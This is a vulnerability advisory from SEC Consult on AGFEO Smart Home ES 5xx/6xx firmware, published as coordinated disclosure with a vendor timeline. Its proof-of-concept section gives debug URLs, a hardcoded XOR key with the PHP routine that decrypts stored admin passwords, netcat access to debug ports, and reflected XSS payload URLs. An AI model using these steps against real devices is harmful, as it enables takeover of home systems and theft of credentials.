SEC Consult Vulnerability Lab Security Advisory < 20170712-0 > ======================================================================= title: Multiple critical vulnerabilities product: AGFEO Smart Home ES 5xx AGFEO Smart Home ES 6xx vulnerable version: at least 1.9b, 1.10 fixed version: 1.12c CVE number: - impact: Critical homepage: found: 2016-12-28 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich ======================================================================= Vendor description: ------------------- AGFEO GmbH & Co. KG is a vendor of telephone systems and other (tele-)communication products like DECT phones, headsets or smart home products as well. Business recommendation: ------------------------ The available patches should be installed immediately. SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals as there are indications for further security issues. Vulnerability overview/description: ----------------------------------- 1) Unauthenticated access to web services and authentication bypass A web service with multiple scripts for debug purposes is accessible on an unusual port on the device. There is also a script to read files from the filesystem. As the web service runs with root privileges all files on the operating system can be read by an attacker. This only affects the ES 5xx product line, all other vulnerabilities affect both ES 5xx and 6xx. The configuration of the device can be changed and arbitrary updates can be uploaded as well as music files for the answering machine. By reading the database content, the usernames and their passwords can be revealed and easily decrypted. This way the administrator password can be dumped from the database and the device can be fully administrated by an attacker. The normal user interface has an additional development subfolder which was probably used during the development process. Updates can be triggered from this sub platform and log files, statistics and states can also be displayed. 2) Unauthenticated access to configuration ports Multiple different instances of TCP services are present on the device. Each of the listening sockets is forked from a debug and configuration service. Internal device information can be read from the device. Among other commands, the configuration of the device can also be altered by using these services. 3) Hardcoded cryptographic keys Three certificates including their private keys are embedded in the firmware of AGFEO ES 5xx/6xx SmartHome products. The certificates and keys in both product lines are exactly the same. One certificate is used for HTTPS (default server certificate for web based configuration and management). Impersonation, man-in-the-middle or passive decryption attacks are possible. These attacks allow an attacker to gain access to sensitive information like admin credentials and use them in further attacks. 4) Multiple reflected cross site scripting (XSS) vulnerabilities The ES 5xx SmartHome products are vulnerable to reflected cross site scripting. Malicious JavaScript code can be executed in the browser of a victim by luring to a handcrafted link. This is possible even if the victim is not logged in. It is assumed that the 6xx products are affected as well but those could not be tested. Proof of concept: ----------------- 1) Unauthenticated access to web services and authentication bypass The debug web service is available by using the following url: http://<Device-IP>:20011/index.html There are different scripts accessible, the following actions can be executed: -) Change IP configuration -) Change time zone -) Upload updates (Any files can be uploaded to the device!) -) Read all files on the filesystem -) Play, delete and move voice messages on all mail boxes -) Converting mp3 files to wav files -) List all connected phones and the related numbers The SQLite database is located under "/home/profile/poolstore.db". By reading this file the usernames and passwords can be dumped. The passwords are encoded with base64 and encrypted with XOR. To decrypt the XOR'ed password the following key has to be used: "0x42 0xab 0xce 0xfa 0x54 0xed 0xcf 0xba" The function to decrypt the password was found in the php script "login.php": function decodePassword($PasswordEnc) { $PasswordBinaryEncBase64 = ""; $PasswordBinaryEnc=""; $PasswordBinary = array(); $Password = ""; $lastChar=0; $Key=array(0x42, 0xab, 0xce, 0xfa, 0x54, 0xed, 0xcf, 0xba); $PasswordBinaryEncBase64 = $PasswordEnc; // base64 decode $PasswordBinaryEnc = base64_decode($PasswordBinaryEncBase64); // xor decode for($i=0; $i<strlen($PasswordBinaryEnc); $i++) { $PasswordBinary[$i] = ord($PasswordBinaryEnc[$i]) ^ $Key[$i % count($Key)] ^ $lastChar; $lastChar = ord($PasswordBinaryEnc[$i]); } // erstes Zeichen entfernen (random char!) foreach ($PasswordBinary as $chr) { $Password .= chr($chr); } $Password = substr($Password, 1); // printf("%s:%d Password %s\n", __FUNCTION__, __LINE__, $Password); return $Password; } An additional subfolder, which contains debug scripts, is available under the following location: http://<Device-IP>/shdev/ui9.php Updates can be triggered, logs can be shown and status messages can be gathered within this functionality. Furthermore, it is possible to debug the login process. Since there is a hardcoded user "admin" a brute force attack is also possible. 2) Unauthenticated access to configuration ports The following TCP ports can be accessed with "nc <Device-IP> -p <Port>": 19002, 19004, 19006, 19009, 19010, 19080, 19081 By connecting to one of these ports a debug interface spawns. For example the connection to port 19081: $ nc 19081 Start Menue: <Return> ========< UPDS - Menue >======== s: show state h: help D: DEBmod on d: DEBmod off L: LOG on l: LOG off S: SERVICE-SUBMENUE q: Quit telnet session ========= NOT AKTIV =========== s status ausgeben (noch nicht vollstaendig implementiert) upds <Timestamp> bState: 00 upds <Timestamp> bLastReceiveBlockNum: 15 [...] S upds <Timestamp> upds <Timestamp> ===== service-menue ====================== upds <Timestamp> help help upds <Timestamp> q quit upds <Timestamp> D dial upds <Timestamp> d disconnect upds <Timestamp> ============ NOT AKTIV =================== service submenue 3) Hardcoded cryptographic keys Refer to our study on hardcoded cryptographic secrets in embedded systems for further information. IoT Inspector ( was used to identify this vulnerability. OpenSSL output for the certificate: Certificate: Data: Version: 1 (0x0) Serial Number: 10293758115057549292 (0x8edac6778bccbfec) Signature Algorithm: sha256WithRSAEncryption Issuer: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, CN=info/emailAddress=info@xxxxxxxx Validity Not Before: Oct 21 14:03:55 2014 GMT Not After : Mar 8 14:03:55 2042 GMT Subject: C=DE, ST=Some-State, L=Bielefeld, O=AGFEO GmbH & Co. KG, OU=Dev, CN=info/emailAddress=info@xxxxxxxx Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (2048 bit) Modulus: 00:be:79:ad:17:e8:c7:9e:63:b3:bb:67:ce:bd:79: 29:66:22:ce:63:99:6a:a5:31:f4:70:5f:3f:9d:11: 94:d6:65:8c:4e:43:6b:e4:d4:f1:f4:bd:81:4c:72: 67:50:10:09:b8:60:b3:cd:be:23:ce:9a:75:ec:e4: 7a:cf:3a:e2:f0:51:f9:a5:f3:c5:67:5d:01:e9:72: 68:b1:59:f5:5b:d8:dc:3e:1d:00:df:06:a6:07:06: 12:70:c7:97:05:a5:da:80:14:2c:c7:ae:6a:ef:a1: 1a:b8:f8:6b:71:5e:91:04:da:43:ba:cf:7c:ef:bd: 01:b7:15:a1:7b:8f:52:21:06:ad:48:b4:57:0c:b2: ac:b2:14:fe:30:38:96:5e:28:b8:68:b2:d3:ee:8d: 28:3c:ac:a0:95:c8:07:39:b7:df:95:6d:88:a2:12: 77:31:a8:55:f6:ab:c7:17:16:03:5f:ca:f2:ca:8f: fd:37:65:2c:b0:aa:47:59:fe:d6:ec:69:8f:db:b6: 9e:93:4b:f0:87:77:90:f6:5c:e4:64:d1:96:99:d5: d8:37:e4:7d:2f:bd:f4:04:fd:67:13:bc:68:ea:e6: 00:dd:72:74:a2:fe:1a:00:27:8b:b8:96:a6:0c:93: 82:52:6d:61:2c:62:02:b2:e8:ab:45:e4:87:98:d2: ba:57 Exponent: 65537 (0x10001) Signature Algorithm: sha256WithRSAEncryption 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scripting (XSS) vulnerabilities The following crafted requests can be used to trigger the cross site scripting vulnerability at different entry points: http://<Device-IP>:20011/ais.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E http://<Device-IP>:20011/xtopbxwav.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E http://<Device-IP>:20011/update.php/%22%3E%3Cscript%3Ealert%28'XSS'%29%3C%2fscript%3E http://<Device-IP>/pbxapi/licence.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E http://<Device-IP>/pbxapi/eoimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E http://<Device-IP>/pbxapi/knximport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E http://<Device-IP>/pbxapi/hmimport.php/%3Cimg%20src=x%20onerror=alert%28'XSS'%29%3E Vulnerable / tested versions: ----------------------------- One firmware is available for the whole ES 5 product line, and another one for the product line ES 6. Therefore, all vulnerabilities which have been found in one product of ES 5/6 are also available in all other products of ES 5/6. The following product / firmware version has been tested by SEC Consult: ES 512 Version 1.9b (es5xxv19b_c063be6) ES 512 Version 1.10 (es5xxv110_f105485) Based on results of the SEC Technologies IoT Inspector ( - automated firmware analysis tool) we believe that the product line ES 6 is also prone to the identified vulnerabilities (except the web service on port 20011) as well as product line ES 5. Firmware Version 1.9b (ES6xxv19b_c063be67b9c2ba) Firmware Version 1.10 (ES6xxv110_f105485715a360) Vendor contact timeline: ------------------------ 2017-01-10: Contacting vendor through info@xxxxxxxx and set release date to 2017-03-01 according to SEC Consult responsible disclosure policy. 2017-01-12: Contact asks for getting the security advisory unencrypted. Sending security advisory unencrypted. 2017-01-17: Call with vendor. Vendor is working on a fix of the found vulnerabilities. 2017-02-06: Asking for status update via mail; Contact responds that most of the vulnerabilities are fixed and a new version will be available soon. 2017-02-22: Asking for status update via mail. Contact responds that a new firmware is available soon. 2017-02-24: New firmware version is 1.12 for ES 5/6 series. 2017-02-28: The firmware will be available in CW11. Shifting release of advisory to 2017-03-15. 2017-03-13: Asked for a status update. 2017-03-14: Vendor responds that the update will be available on 2017-03-21. Shifted release to 2017-03-21. 2017-03-20: Asked vendor when the updated firmware is available as download; Vendor responds that the updated firmware which contains fixes for all vulnerabilities can be received after contacting their Hotline. They also stated that the update will be available on the homepage in the next few days. Informed the vendor that the advisory will be published when the update is available on the homepage in the next few days. Shifted release to CW14. 2017-04-05: Asked for status update. Vendor responds that firmware will be available next week. Shifted release to unknown. 2017-04-24: Asked whether the download is available or not. Firmware will be available next week. 2017-04-25: Found new version 1.12a for ES 6xx on vendor home page. 2017-05-26: Found new version 1.11a for ES 5xx on vendor home page. 2017-05-29: Asked whether the current firmware contains all the fixes. Vendor responds that only a part of the vulnerabilities is fixed. They also state that v1.12b is for all products except "ES5xx up" will be available this week. This firmware contains all fixes. 2017-06-06: Asked vendor for the actual state, because the contact said that all vulnerabilities are fixed and the firmware can be received after calling the hotline. Asked vendor which vulnerabilities are actually fixed; No answer. 2017-06-14: Informed vendor that the advisory will be published on 2017-07-12 because of the long "ping-pong" game without real outcome. 2017-06-22: Contact stated that version 1.12c will be available next week. 2017-07-03: Found new version 1.12c for ES 5/6/7 on vendor home page (available since 2017-06-30). 2017-07-12: Coordinated release of security advisory. Solution: --------- Call AGFEO hotline (+49 521 44709-0) or log in to the vendor home page to get the newest firmware version. Workaround: ----------- None Advisory URL: ------------- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: Blog: Twitter: EOF T. Weber / @2017
Description: S/MIME Cryptographic Signature